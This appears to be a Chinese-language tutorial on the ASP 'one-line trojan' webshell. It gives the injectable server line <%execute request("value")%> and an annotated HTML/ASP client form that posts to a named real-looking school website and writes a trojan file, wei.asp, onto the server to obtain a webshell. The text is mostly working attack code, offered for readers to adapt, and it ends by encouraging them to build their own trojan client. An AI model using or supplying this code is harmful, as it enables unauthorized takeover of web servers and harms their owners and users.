一句话木马原理

 

一句话木马原理

“一句话木马”服务端

     就是我们要用来插入到asp文件中的asp语句，（不仅仅是以asp为后缀的数据库文件），该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为   <%execute request("value")%>   其中value可以自己修改

“一句话木马”客户端

      用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件

一句话木马客户端源文件：

里面涉及到一些脚本知识，我就只讲解一下功能和简单注释，不详细讲了，大家只要注意几个注意点就行了

***********************************************************

//后面是注释，学c的人应该很熟悉

<form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp

//"action="后面是需要修改的以asp命名的数据库的提交地址

method=post>

//这个标签的意思是建立一个表单 以post方式提交给连接

http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

<textarea name=value cols=120 rows=10 width=45> //这里的value值根据服务端<%execute request("value")%>中value而设定可以自行修改成<%execute request("p")%>相应这里的value值也必须改为p

   set lP=server.createObject("Adodb.Stream")

//建立流对象，有了对象才可以使用它固有的属性和方法

lP.Open //打开

lP.Type=2 //以文本方式

lP.CharSet="gb2312" //字体标准

lP.writetext request("joeving")

//取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应

lP.SaveToFile server.mappath("wei.asp"),2

//将木马内容以覆盖文件的方式写入wei.asp，2就是已覆盖的方式，这里的wei.asp也是可以自己定义的，如定义成1.asp，但和下response.redirect"wei.asp"中wei.asp的保持一致

lP.Close //关闭对象

set lP=nothing //释放对象

response.redirect "wei.asp"

//转向生成的wei.asp 和上面的wei.asp相对应，也就是你熟悉的asp木马登陆界面

</textarea>

//这段程序的功能：利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个textarea中的内容，并将添加的木马内容写入和指向wei.asp，这样就相当于在服务器上建立了个asp木马文件，这样就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>

//这段标签是你用来添加木马内容用的

<input type=submit value=提交>

//提交

程序的主要框架是

<form>

<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示

<textarea></textarea>//添加木马内容用的

</form>

***********************************************************

其实都是些很简单的一些html和asp的知识，大家不妨自己写个自己的木马客户端~~~呵呵